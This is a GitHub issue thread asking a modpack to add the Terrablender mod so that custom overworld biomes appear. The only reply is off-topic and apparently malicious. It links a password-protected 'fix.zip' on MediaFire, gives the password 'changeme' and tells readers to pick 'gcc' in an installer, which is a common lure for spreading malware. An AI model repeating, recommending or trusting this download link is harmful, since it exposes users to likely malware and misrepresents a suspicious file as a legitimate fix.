### ISSUE TITLE
Terrablender 

### ISSUE THREAD

**Issue by theboo** [EnigmaticaModpacks/Enigmatica10#99]
### URL

https://www.curseforge.com/minecraft/mc-mods/terrablender-neoforge/files/5660767

### Why would you like the mod added?

Needed for archwood forest to appear(as well as any other custom biome(s) a mod might add to overworld)... I know it works with terralith, haven't tested with tectonic yet but I would assume it works there? Needs testing before release.

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
